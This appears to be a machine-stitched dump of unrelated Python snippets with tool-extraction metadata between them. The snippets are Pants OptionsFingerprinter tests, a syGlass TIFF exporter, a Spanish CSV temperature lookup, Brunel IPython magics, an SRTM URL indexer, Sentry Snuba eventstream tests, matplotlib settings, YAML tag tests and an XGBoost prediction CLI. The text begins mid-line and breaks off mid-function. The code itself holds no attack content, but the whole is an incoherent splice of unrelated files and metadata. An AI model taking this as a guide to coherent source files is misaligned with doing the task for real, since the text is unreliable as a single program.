    assert fp([1, 2, 3]) != fp([1, 3, 2])
def test_fingerprint_file(rule_runner: RuleRunner) -> None:
    """Both the path and the content of a file option feed its fingerprint."""

    def fp(rel_path, content):
        written = rule_runner.write_files({rel_path: content})[0]
        return OptionsFingerprinter().fingerprint(file_option, written)

    fp1 = fp("foo/bar.config", "blah blah blah")
    fp2 = fp("foo/bar.config", "meow meow meow")
    fp3 = fp("spam/egg.config", "blah blah blah")
    assert fp1 != fp2
    assert fp1 != fp3
    assert fp2 != fp3
def test_fingerprint_file_outside_buildroot(tmp_path: Path, rule_runner: RuleRunner) -> None:
    """Fingerprinting a file_option value outside the build root is rejected."""
    external = rule_runner.write_files({(tmp_path / "foobar").as_posix(): "foobar"})[0]
    with pytest.raises(ValueError):
        OptionsFingerprinter().fingerprint(file_option, external)
def test_fingerprint_file_list(rule_runner: RuleRunner) -> None:
    """File-list fingerprints ignore ordering but depend on the files chosen."""
    specs = (
        ("foo/bar.config", "blah blah blah"),
        ("foo/bar.config", "meow meow meow"),
        ("spam/egg.config", "blah blah blah"),
    )
    first, second, third = [
        rule_runner.write_files({rel: content})[0] for rel, content in specs
    ]
    fp_forward = OptionsFingerprinter().fingerprint(file_option, [first, second])
    fp_reversed = OptionsFingerprinter().fingerprint(file_option, [second, first])
    fp_other = OptionsFingerprinter().fingerprint(file_option, [first, third])
    assert fp_forward == fp_reversed
    assert fp_forward != fp_other
def test_fingerprint_primitive() -> None:
    """Distinct primitive values produce distinct fingerprints."""
    fp_str = OptionsFingerprinter().fingerprint("", "foo")
    fp_int = OptionsFingerprinter().fingerprint("", 5)
    assert fp_str != fp_int
def test_fingerprint_unset_bool() -> None:
    """The UnsetBool sentinel fingerprints deterministically across calls."""
    first, second = (
        OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool) for _ in range(2)
    )
    assert first == second
def test_fingerprint_dir(rule_runner: RuleRunner) -> None:
    """Directory fingerprints depend on contents and on list order."""
    d1 = rule_runner.create_dir("a")
    d2 = rule_runner.create_dir("b")
    d3 = rule_runner.create_dir("c")
    # Dirs "a" and "b" hold identical file contents under different roots;
    # "c" holds different content.
    rule_runner.write_files(
        {
            "a/bar/bar.config": "blah blah blah",
            "a/foo/foo.config": "meow meow meow",
            "b/foo/foo.config": "meow meow meow",
            "b/bar/bar.config": "blah blah blah",
            "c/bar/bar.config": "blah meow blah",
        }
    )
    dp1 = OptionsFingerprinter().fingerprint(dir_option, [d1])
    dp2 = OptionsFingerprinter().fingerprint(dir_option, [d1, d2])
    dp3 = OptionsFingerprinter().fingerprint(dir_option, [d2, d1])
    dp4 = OptionsFingerprinter().fingerprint(dir_option, [d3])
    # NOTE(review): the first two asserts compare a value against itself and
    # are tautologies; presumably meant as fingerprint-stability checks
    # (re-fingerprinting the same input) — confirm intent before changing.
    assert dp1 == dp1
    assert dp2 == dp2
    assert dp1 != dp3
    assert dp1 != dp4
    assert dp2 != dp3
def test_fingerprint_dict_with_files_order(rule_runner: RuleRunner) -> None:
    """File lists embedded in dict values fingerprint the same in any order."""
    specs = (
        ("foo/bar.config", "blah blah blah"),
        ("foo/bar.config", "meow meow meow"),
    )
    f1, f2 = (rule_runner.write_files({rel: content})[0] for rel, content in specs)
    forward = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
    backward = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f2},{f1}"})
    assert forward == backward
def test_fingerprint_dict_with_file_content_change(rule_runner: RuleRunner) -> None:
    """Changing a referenced file's content changes the dict fingerprint."""
    specs = (
        ("foo/bar.config", "blah blah blah"),
        ("foo/bar.config", "meow meow meow"),
    )
    f1, f2 = (rule_runner.write_files({rel: content})[0] for rel, content in specs)
    value = {"properties": f"{f1},{f2}"}
    before = OptionsFingerprinter().fingerprint(dict_with_files_option, value)
    Path(f1).write_text("123")
    after = OptionsFingerprinter().fingerprint(dict_with_files_option, value)
    assert before != after
| [
"pytest.raises",
"pants.testutil.rule_runner.RuleRunner",
"pants.option.options_fingerprinter.OptionsFingerprinter"
] | [((519, 531), 'pants.testutil.rule_runner.RuleRunner', 'RuleRunner', ([], {}), '()\n', (529, 531), False, 'from pants.testutil.rule_runner import RuleRunner\n'), ((1871, 1896), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1884, 1896), False, 'import pytest\n'), ((912, 934), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (932, 934), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2303, 2325), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2323, 2325), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2371, 2393), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2391, 2393), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2439, 2461), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2459, 2461), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2741, 2763), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2761, 2763), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2808, 2830), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2828, 2830), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3376, 3398), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3396, 3398), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3439, 3461), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3459, 3461), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3506, 3528), 
'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3526, 3528), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3573, 3595), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3593, 3595), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4024, 4046), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4044, 4046), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4123, 4145), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4143, 4145), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4530, 4552), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4550, 4552), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4682, 4704), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4702, 4704), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((679, 701), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (699, 701), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1130, 1152), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (1150, 1152), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1328, 1350), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (1348, 1350), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1906, 1928), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', 
(1926, 1928), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2601, 2623), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2621, 2623), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n')] |
import os
import sys
import syglass as sy
from syglass import pyglass
import numpy as np
import tifffile
import subprocess
def extract(projectPath):
    """Export every z-slice of a syGlass project as a TIFF file.

    Reads the highest-resolution level of the project at ``projectPath`` one
    z-slice at a time and writes each slice as
    ``<project_name>_<NNNNN>.tiff`` in the project's directory, then opens
    that directory in Windows Explorer.
    """
    project = sy.get_project(projectPath)
    head, tail = os.path.split(projectPath)
    # The resolution map is a dict keyed by level; the highest-resolution
    # level is the last one.
    resolution_map = project.get_resolution_map()
    max_resolution_level = len(resolution_map) - 1
    # Project size at that level is (z, x, y).
    total_size = project.get_size(max_resolution_level)
    zslices = total_size[0]
    xsize = total_size[1]
    ysize = total_size[2]
    # Fetch one full xy-plane (a single z-slice) per request.
    dimensions = np.asarray([1, xsize, ysize])
    offset = np.asarray([0, 0, 0])
    # Write output TIFFs next to the project file.
    os.chdir(os.path.dirname(projectPath))
    for slice_index in range(zslices):
        s = str(slice_index).zfill(5)
        offset[0] = slice_index
        block = project.get_custom_block(0, max_resolution_level, offset, dimensions)
        filename = tail + "_" + s + ".tiff"
        # Log the actual output filename (the original printed only the
        # zero-padded index, which did not match the file written).
        print(filename)
        tifffile.imwrite(filename, block.data)
    # Windows-only: open the containing folder when extraction finishes.
    subprocess.run(['explorer', head])
def main():
    """Entry point: extract each syGlass project path given on the command line."""
    print("Image Extractor, by <NAME>")
    print("Attempts to extract the original data volume from a syGlass project")
    print("and write it to a series of TIFF files")
    print("---------------------------------------")
    print("Usage: Highlight a project and use the Script Launcher in syGlass.")
    print("---------------------------------------")
    print(sys.argv)
    # Skip sys.argv[0]: it is this script's own path, not a project to extract.
    for syGlassProjectPath in sys.argv[1:]:
        print("Extracting project from: " + syGlassProjectPath)
        extract(syGlassProjectPath)
if __name__== "__main__":
main() | [
"subprocess.run",
"numpy.asarray",
"os.path.split",
"os.path.dirname",
"syglass.get_project",
"tifffile.imwrite"
] | [((162, 189), 'syglass.get_project', 'sy.get_project', (['projectPath'], {}), '(projectPath)\n', (176, 189), True, 'import syglass as sy\n'), ((204, 230), 'os.path.split', 'os.path.split', (['projectPath'], {}), '(projectPath)\n', (217, 230), False, 'import os\n'), ((736, 765), 'numpy.asarray', 'np.asarray', (['[1, xsize, ysize]'], {}), '([1, xsize, ysize])\n', (746, 765), True, 'import numpy as np\n'), ((775, 796), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (785, 796), True, 'import numpy as np\n'), ((1084, 1118), 'subprocess.run', 'subprocess.run', (["['explorer', head]"], {}), "(['explorer', head])\n", (1098, 1118), False, 'import subprocess\n'), ((805, 833), 'os.path.dirname', 'os.path.dirname', (['projectPath'], {}), '(projectPath)\n', (820, 833), False, 'import os\n'), ((1034, 1082), 'tifffile.imwrite', 'tifffile.imwrite', (["(tail + '_' + s + '.tiff')", 'data'], {}), "(tail + '_' + s + '.tiff', data)\n", (1050, 1082), False, 'import tifffile\n')] |
# Read the file and process it so that it can show the maximum temperature
# for a given city. The city is received as user input. If the city does
# not exist, that must be handled through an exception.
import csv

provincia = input('Diga el nombre de la ciudad: ')

with open("climatologia.csv", encoding="utf-8") as csvfile:
    reader = csv.reader(csvfile, delimiter=",")
    try:
        # Scan the whole file before deciding the city is missing.
        # (The previous version raised on the FIRST row that did not match,
        # so the search aborted immediately for almost every city.)
        encontrada = False
        for row in reader:
            if (provincia == row[2]):
                encontrada = True
                temperatura_maxima = row[3]
                print(f"provincia: '{provincia}' con temperatura maxima de {temperatura_maxima}")
        if not encontrada:
            raise Exception("No existe ninguna ciudad: " + provincia)
    except Exception as cityNotFound:
        print(cityNotFound)
| [
"csv.reader"
] | [((389, 423), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (399, 423), False, 'import csv\n')] |
# Copyright (c) 2015 IBM Corporation and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython.core.magic import Magics, magics_class, line_magic, cell_magic, line_cell_magic
import pandas as pd
import brunel.brunel_main as brunel
ipy = get_ipython()
@magics_class
class BrunelMagics(Magics):
    """IPython magics that render Brunel visualizations from notebook input."""
    @line_cell_magic
    def brunel(self, line, cell=None):
        "Magic that works both as %brunel and as %%brunel"
        # All pandas DataFrames currently defined in the user's namespace.
        datas = self.find_dataframes()
        # print("Found dataframes", list(datas.keys()))
        if cell is not None:
            # Cell magic: fold the cell body into a single command line.
            line = line + ' ' + cell.replace('\n',' ')
        # print ("Command =", line)
        data = None
        height = 400
        width = 500
        output = 'd3'
        online_js = False
        # NOTE(review): the command is split on '::' although the error
        # message below talks about ':' -- confirm the intended syntax.
        parts = line.split('::')
        action = parts[0].strip()
        datasets_in_brunel = brunel.get_dataset_names(action)
        self.cache_data(datasets_in_brunel,datas)
        if len(parts) > 2:
            raise ValueError("Only one ':' allowed in brunel magic. Format is 'ACTION : key=value, ...'")
        if len(parts) > 1:
            extras = parts[1].strip()
            dataName = self.find_term('data', extras)
            if dataName is not None:
                try:
                    data = datas[dataName]
                except:
                    raise ValueError("Could not find pandas DataFrame named '" + dataName + "'")
            # NOTE(review): find_term returns strings, so width/height may be
            # passed to brunel.display as str rather than int -- confirm.
            width = self.find_term('width', extras, width)
            height = self.find_term('height', extras, height)
            online_js = self.find_term('online_js', extras, online_js)
        if data is None and len(datasets_in_brunel) == 0:
            # No explicit data: pick the DataFrame whose columns best match
            # the variable names referenced in the Brunel action string.
            data = self.best_match(self.get_vars(action), list(datas.values()))
        return brunel.display(action, data, width, height, online_js)
    def cache_data(self, datasets_in_brunel, dataframes):
        """Push CSV copies of the named DataFrames into Brunel's data cache."""
        for data_name in datasets_in_brunel:
            try:
                data = dataframes[data_name]
                brunel.cacheData(data_name, brunel.to_csv(data))
            except:
                # Best effort: names without a matching DataFrame are skipped.
                pass
    def find_term(self, key, string, default=None):
        """Return the value for ``key`` in a 'key=value, ...' string, else ``default``."""
        for expr in string.split(','):
            terms = expr.split('=')
            if len(terms) != 2:
                raise ValueError("Bad format for key=value pair: " + expr)
            if key == terms[0].strip().lower():
                return terms[1].strip()
        return default
    def find_dataframes(self):
        """Map variable name -> DataFrame for public DataFrames in the shell namespace."""
        result = {}
        for name in list(self.shell.user_ns.keys()):
            v = self.shell.user_ns[name]
            if name[0] != '_' and isinstance(v, pd.DataFrame):
                result[name] = v
        return result
    def get_vars(self, line):
        "Search for the internal bits of 'x(a,b)' and return as ['a','b']"
        result = []
        for part in line.split('('):
            p = part.find(')')
            if p > 0:
                inner = part[:p].split(',')
                for term in inner:
                    result.append(term.strip())
        return result
    def best_match(self, variables, datas):
        """Return the DataFrame whose columns share the most names with ``variables``."""
        # print("Searching for", variables, "in", len(datas), "dataframes")
        # match() returns a negated count, so the best match sorts first.
        all = [[self.match(variables, v.columns.values), v] for v in datas]
        all.sort(key=lambda x: x[0])
        return all[0][1]
    def match(self, names1, names2):
        """Return the negated count of case-insensitive common names (for sorting)."""
        n = 0
        for i in names1:
            for j in names2:
                if str(i).lower() == str(j).lower(): n += 1
        return -n
# Register with IPython
# Makes %brunel / %%brunel available in the running IPython session.
ipy.register_magics(BrunelMagics)
| [
"brunel.brunel_main.display",
"brunel.brunel_main.get_dataset_names",
"brunel.brunel_main.to_csv"
] | [((1351, 1383), 'brunel.brunel_main.get_dataset_names', 'brunel.get_dataset_names', (['action'], {}), '(action)\n', (1375, 1383), True, 'import brunel.brunel_main as brunel\n'), ((2254, 2308), 'brunel.brunel_main.display', 'brunel.display', (['action', 'data', 'width', 'height', 'online_js'], {}), '(action, data, width, height, online_js)\n', (2268, 2308), True, 'import brunel.brunel_main as brunel\n'), ((2519, 2538), 'brunel.brunel_main.to_csv', 'brunel.to_csv', (['data'], {}), '(data)\n', (2532, 2538), True, 'import brunel.brunel_main as brunel\n')] |
#!/usr/bin/python
"""Build a tile-name -> download-URL index for SRTM v2.1 3-arc-second data."""
import fileinput
import json

url_base = "https://dds.cr.usgs.gov/srtm/version2_1/SRTM3"

regions = [
    "Africa",
    "Australia",
    "Eurasia",
    "Islands",
    "North_America",
    "South_America",
]

srtm_dict = {}
srtm_directory = "srtm.json"

for region in regions:
    print("Processing", region)
    # Each region file lists one .hgt.zip tile name per line.
    # 'with' closes the fileinput stream even on errors (it was
    # previously left open).
    with fileinput.input(region) as f:
        for name in f:
            name = name.strip()
            url = url_base + "/" + region + "/" + name
            key = name.replace(".hgt.zip", "")
            srtm_dict[key] = url

try:
    print("Writing", srtm_directory)
    # 'with' guarantees the output file is closed even if json.dump raises.
    with open(srtm_directory, "w") as f:
        json.dump(srtm_dict, f, indent=2, sort_keys=True)
except IOError as e:
    print("Save srtm_dict(): I/O error({0}): {1}".format(e.errno, e.strerror))
| [
"fileinput.input",
"json.dump"
] | [((336, 359), 'fileinput.input', 'fileinput.input', (['region'], {}), '(region)\n', (351, 359), False, 'import fileinput\n'), ((611, 660), 'json.dump', 'json.dump', (['srtm_dict', 'f'], {'indent': '(2)', 'sort_keys': '(True)'}), '(srtm_dict, f, indent=2, sort_keys=True)\n', (620, 660), False, 'import json\n')] |
from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from sentry.utils.compat.mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.eventstream.snuba import SnubaEventStream
from sentry.testutils import SnubaTestCase, TestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(TestCase, SnubaTestCase):
    """Round-trip test: event payloads produced for Kafka are replayed into Snuba."""
    def setUp(self):
        super(SnubaEventStreamTest, self).setUp()
        # Real KafkaEventStream, but the producer is mocked so nothing is
        # actually sent to Kafka; we inspect the produce() call instead.
        self.kafka_eventstream = KafkaEventStream()
        self.kafka_eventstream.producer = Mock()
    def __build_event(self, timestamp):
        """Create, normalize and save a minimal error event at ``timestamp``."""
        raw_event = {
            "event_id": "a" * 32,
            "message": "foo",
            "timestamp": time.mktime(timestamp.timetuple()),
            "level": logging.ERROR,
            "logger": "default",
            "tags": [],
        }
        manager = EventManager(raw_event)
        manager.normalize()
        return manager.save(self.project.id)
    def __produce_event(self, *insert_args, **insert_kwargs):
        """Run an insert through the Kafka stream, then feed its payload to Snuba."""
        # pass arguments on to Kafka EventManager
        self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
        # Inspect what would have been produced to the "events" topic.
        produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
        assert not produce_args
        assert produce_kwargs["topic"] == "events"
        assert produce_kwargs["key"] == six.text_type(self.project.id)
        version, type_, payload1, payload2 = json.loads(produce_kwargs["value"])
        assert version == 2
        assert type_ == "insert"
        # insert what would have been the Kafka payload directly
        # into Snuba, expect an HTTP 200 and for the event to now exist
        snuba_eventstream = SnubaEventStream()
        snuba_eventstream._send(self.project.id, "insert", (payload1, payload2))
    @patch("sentry.eventstream.insert")
    def test(self, mock_eventstream_insert):
        """A grouped event round-trips through the stream and becomes queryable."""
        now = datetime.utcnow()
        event = self.__build_event(now)
        # verify eventstream was called by EventManager
        insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
        assert not insert_args
        assert insert_kwargs == {
            "event": event,
            "group": event.group,
            "is_new_group_environment": True,
            "is_new": True,
            "is_regression": False,
            "primary_hash": "acbd18db4cc2f85cedef654fccc4a4d8",
            "skip_consume": False,
            "received_timestamp": event.data["received"],
        }
        self.__produce_event(*insert_args, **insert_kwargs)
        # Exactly one event for this project should now be counted in Snuba.
        assert (
            snuba.query(
                start=now - timedelta(days=1),
                end=now + timedelta(days=1),
                groupby=["project_id"],
                filter_keys={"project_id": [self.project.id]},
            ).get(self.project.id, 0)
            == 1
        )
    @patch("sentry.eventstream.insert")
    def test_issueless(self, mock_eventstream_insert):
        """An event without a group (group_id=None) is stored with a null group."""
        now = datetime.utcnow()
        event = self.__build_event(now)
        event.group_id = None
        insert_args = ()
        insert_kwargs = {
            "event": event,
            "group": None,
            "is_new_group_environment": True,
            "is_new": True,
            "is_regression": False,
            "primary_hash": "acbd18db4cc2f85cedef654fccc4a4d8",
            "skip_consume": False,
            "received_timestamp": event.data["received"],
        }
        self.__produce_event(*insert_args, **insert_kwargs)
        result = snuba.raw_query(
            start=now - timedelta(days=1),
            end=now + timedelta(days=1),
            selected_columns=["event_id", "group_id"],
            groupby=None,
            filter_keys={"project_id": [self.project.id], "event_id": [event.event_id]},
        )
        assert len(result["data"]) == 1
        assert result["data"][0]["group_id"] is None
| [
"datetime.datetime.utcnow",
"datetime.timedelta",
"sentry.utils.compat.mock.patch",
"sentry.eventstream.kafka.KafkaEventStream",
"sentry.utils.compat.mock.Mock",
"sentry.eventstream.snuba.SnubaEventStream",
"six.text_type",
"sentry.utils.json.loads",
"sentry.event_manager.EventManager"
] | [((1894, 1928), 'sentry.utils.compat.mock.patch', 'patch', (['"""sentry.eventstream.insert"""'], {}), "('sentry.eventstream.insert')\n", (1899, 1928), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((2954, 2988), 'sentry.utils.compat.mock.patch', 'patch', (['"""sentry.eventstream.insert"""'], {}), "('sentry.eventstream.insert')\n", (2959, 2988), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((573, 591), 'sentry.eventstream.kafka.KafkaEventStream', 'KafkaEventStream', ([], {}), '()\n', (589, 591), False, 'from sentry.eventstream.kafka import KafkaEventStream\n'), ((634, 640), 'sentry.utils.compat.mock.Mock', 'Mock', ([], {}), '()\n', (638, 640), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((950, 973), 'sentry.event_manager.EventManager', 'EventManager', (['raw_event'], {}), '(raw_event)\n', (962, 973), False, 'from sentry.event_manager import EventManager\n'), ((1525, 1560), 'sentry.utils.json.loads', 'json.loads', (["produce_kwargs['value']"], {}), "(produce_kwargs['value'])\n", (1535, 1560), False, 'from sentry.utils import snuba, json\n'), ((1788, 1806), 'sentry.eventstream.snuba.SnubaEventStream', 'SnubaEventStream', ([], {}), '()\n', (1804, 1806), False, 'from sentry.eventstream.snuba import SnubaEventStream\n'), ((1988, 2005), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2003, 2005), False, 'from datetime import datetime, timedelta\n'), ((3058, 3075), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (3073, 3075), False, 'from datetime import datetime, timedelta\n'), ((1448, 1478), 'six.text_type', 'six.text_type', (['self.project.id'], {}), '(self.project.id)\n', (1461, 1478), False, 'import six\n'), ((3649, 3666), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3658, 3666), False, 'from datetime import datetime, timedelta\n'), ((3690, 3707), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3699, 3707), False, 'from 
datetime import datetime, timedelta\n'), ((2716, 2733), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2725, 2733), False, 'from datetime import datetime, timedelta\n'), ((2761, 2778), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2770, 2778), False, 'from datetime import datetime, timedelta\n')] |
"""User specific settings."""
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams['font.size'] = 7
mpl.rcParams['pdf.fonttype'] = 42
mpl.rcParams['ps.fonttype'] = 42
mpl.rcParams['font.family'] = 'arial'
mpl.rcParams['mathtext.fontset'] = 'stix'
seqcmap = mpl.cm.cool_r
try:
import seaborn as sns
plt.rcParams['axes.prop_cycle'] = plt.cycler(color=sns.color_palette('deep'))
# seqcmap = sns.color_palette("crest_r", as_cmap=True)
except ImportError as e:
print('Seaborn not available, default to matplotlib color scheme')
use_torch = True
cluster_path = '/share/ctn/users/gy2259/olfaction_evolution'
| [
"seaborn.color_palette"
] | [((377, 402), 'seaborn.color_palette', 'sns.color_palette', (['"""deep"""'], {}), "('deep')\n", (394, 402), True, 'import seaborn as sns\n')] |
#!/bin/python3
# author: <NAME>
import tests
tests.fix_paths()
import yaml
from unittest import TestCase
from cihpc.cfg.config import global_configuration
from cihpc.common.utils import extend_yaml
# Sample YAML documents exercising each custom tag registered by extend_yaml.
repeat_yaml = '''
foo: !repeat a 5
'''
range_yaml = '''
foo: !range 1 5
bar: !range 1 2 6
'''
sh_yaml = '''
foo: !readfile yaml/foo.txt
'''
class TestExtendYaml(TestCase):
    """Tests for the custom YAML tags registered by extend_yaml.extend()."""
    def test_extend(self):
        """All custom constructors are registered on yaml.Loader."""
        extend_yaml.extend()
        self.assertIn('!range', yaml.Loader.yaml_constructors)
        self.assertIn('!repeat', yaml.Loader.yaml_constructors)
        self.assertIn('!readfile', yaml.Loader.yaml_constructors)
        self.assertIn('!readyaml', yaml.Loader.yaml_constructors)
    def test_repeat(self):
        """!repeat, !range and !readfile produce the expected values."""
        extend_yaml.extend()
        # Pass the Loader explicitly: the constructors are registered on
        # yaml.Loader, and calling yaml.load without a Loader is deprecated
        # in PyYAML >= 5.1 (and may warn or fail).
        result = yaml.load(repeat_yaml, Loader=yaml.Loader)
        self.assertEqual(result.get('foo'), 'a'*5)
        result = yaml.load(range_yaml, Loader=yaml.Loader)
        self.assertTupleEqual(tuple(result.get('foo')), tuple(range(1, 5)))
        self.assertTupleEqual(tuple(result.get('bar')), tuple(range(1, 2, 6)))
        # !readfile resolves paths relative to the configured project dir.
        global_configuration.project_cfg_dir = tests.__dir__
        result = yaml.load(sh_yaml, Loader=yaml.Loader)
        self.assertEqual(result.get('foo'), 'top-secret')
| [
"yaml.load",
"cihpc.common.utils.extend_yaml.extend",
"tests.fix_paths"
] | [((48, 65), 'tests.fix_paths', 'tests.fix_paths', ([], {}), '()\n', (63, 65), False, 'import tests\n'), ((416, 436), 'cihpc.common.utils.extend_yaml.extend', 'extend_yaml.extend', ([], {}), '()\n', (434, 436), False, 'from cihpc.common.utils import extend_yaml\n'), ((732, 752), 'cihpc.common.utils.extend_yaml.extend', 'extend_yaml.extend', ([], {}), '()\n', (750, 752), False, 'from cihpc.common.utils import extend_yaml\n'), ((771, 793), 'yaml.load', 'yaml.load', (['repeat_yaml'], {}), '(repeat_yaml)\n', (780, 793), False, 'import yaml\n'), ((863, 884), 'yaml.load', 'yaml.load', (['range_yaml'], {}), '(range_yaml)\n', (872, 884), False, 'import yaml\n'), ((1120, 1138), 'yaml.load', 'yaml.load', (['sh_yaml'], {}), '(sh_yaml)\n', (1129, 1138), False, 'import yaml\n')] |
import os
import sys
from dataclasses import dataclass
import click
import numpy as np
import xgboost as xgb
from rich import print, traceback
WD = os.path.dirname(__file__)
@click.command()
@click.option('-i', '--input', required=True, type=str, help='Path to data file to predict.')
@click.option('-m', '--model', type=str, help='Path to an already trained XGBoost model. If not passed a default model will be loaded.')
@click.option('-c/-nc', '--cuda/--no-cuda', type=bool, default=False, help='Whether to enable cuda or not')
@click.option('-o', '--output', type=str, help='Path to write the output to')
def main(input: str, model: str, cuda: bool, output: str):
    """Command-line interface for {{ cookiecutter.project_name }}"""
    # The [bold blue]/[green] tags below are console markup for rich.print.
    print(r"""[bold blue]
    {{ cookiecutter.project_name }}
    """)
    print('[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n')
    # NOTE(review): the parameter name 'input' shadows the builtin; renaming it
    # would change the click option-to-argument mapping, so it is left as is.
    if not model:
        # Fall back to the test model shipped alongside this module.
        model = get_xgboost_model(f'{WD}/models/xgboost_test_model.xgb')
    else:
        model = get_xgboost_model(model)
    if cuda:
        model.set_param({'predictor': 'gpu_predictor'})
    print('[bold blue] Parsing data')
    data_to_predict = parse_data_to_predict(input)
    print('[bold blue] Performing predictions')
    # Round raw prediction scores to the nearest integer (hard labels).
    predictions = np.round(model.predict(data_to_predict.DM))
    print(predictions)
    if output:
        print(f'[bold blue]Writing predictions to {output}')
        write_results(predictions, output)
@dataclass
class Dataset:
    """Parsed input data bundled with the xgboost DMatrix built from it."""
    # Feature matrix; parse_data_to_predict fills it with one row per sample.
    X: np.ndarray
    # Integer labels parsed from the header, one per sample.
    y: list
    # DMatrix built from X and y, ready for Booster.predict.
    DM: xgb.DMatrix
    # First two columns of each data row -- presumably gene identifiers.
    gene_names: list
    # Sample identifiers parsed from the header.
    sample_names: list
def parse_data_to_predict(path_to_data_to_predict: str) -> Dataset:
    """
    Read the tab-separated input file and wrap it in a Dataset, DMatrix included.

    The header row encodes each run as "<label>_<sample>" from the third
    column onward; every following row holds two annotation columns and then
    one value per run.

    :param path_to_data_to_predict: Path to the data on which predictions should be performed on
    """
    feature_rows = []
    labels = []
    gene_names = []
    sample_names = []
    with open(path_to_data_to_predict, "r") as handle:
        header_runs = next(handle).split("\n")[0].split("\t")[2:]
        for run_info in header_runs:
            pieces = run_info.split("_")
            labels.append(int(pieces[0]))
            sample_names.append(pieces[1])
        for line in handle:
            columns = line.split("\n")[0].split("\t")
            feature_rows.append([float(value) for value in columns[2:]])
            gene_names.append(columns[:2])
    # Transpose so samples become rows and genes become columns.
    feature_matrix = np.array([list(column) for column in zip(*feature_rows)])
    dmatrix = xgb.DMatrix(feature_matrix, label=labels)
    return Dataset(feature_matrix, labels, dmatrix, gene_names, sample_names)
def write_results(predictions: np.ndarray, path_to_write_to) -> None:
    """
